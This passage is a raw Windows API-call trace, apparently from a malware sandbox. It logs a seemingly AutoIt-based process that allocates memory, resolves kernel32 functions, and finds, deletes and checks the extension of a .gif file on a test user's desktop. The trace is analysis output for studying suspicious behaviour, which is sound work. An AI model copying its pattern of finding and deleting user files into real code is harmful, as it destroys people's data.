lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.874] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa) returned 0x76e180 [0075.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x76e180, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0075.875] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.875] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.875] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.875] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0075.875] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0075.875] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.875] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.875] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.875] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.875] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.875] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.875] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.875] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.875] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.875] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0075.876] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.876] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.876] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df70 [0075.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76df70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.877] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.877] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.877] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.877] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1b20 [0075.877] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.877] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.877] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.877] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.877] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.877] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0075.877] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.877] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.877] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.877] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif", lpFilePart=0x0) returned 0x32 [0075.877] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22e93f80, ftCreationTime.dwHighDateTime=0x1d5e220, ftLastAccessTime.dwLowDateTime=0x28f76500, ftLastAccessTime.dwHighDateTime=0x1d5d8c0, ftLastWriteTime.dwLowDateTime=0xc9ffb520, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdbe2, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="4N8tFmD4.gif", cAlternateFileName="")) returned 0x6b8b38 [0075.877] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4n8tfmd4.gif")) returned 1 [0075.879] FindNextFileW (in: hFindFile=0x6b8b38, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22e93f80, ftCreationTime.dwHighDateTime=0x1d5e220, ftLastAccessTime.dwLowDateTime=0x28f76500, ftLastAccessTime.dwHighDateTime=0x1d5d8c0, ftLastWriteTime.dwLowDateTime=0xc9ffb520, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdbe2, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="4N8tFmD4.gif", cAlternateFileName="")) returned 0 [0075.879] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0075.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x69d7a8 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0075.880] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.880] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.881] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9c8 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.881] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.882] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0075.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690980 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e318 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.882] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0075.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0075.882] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.883] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0075.883] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.884] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.885] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 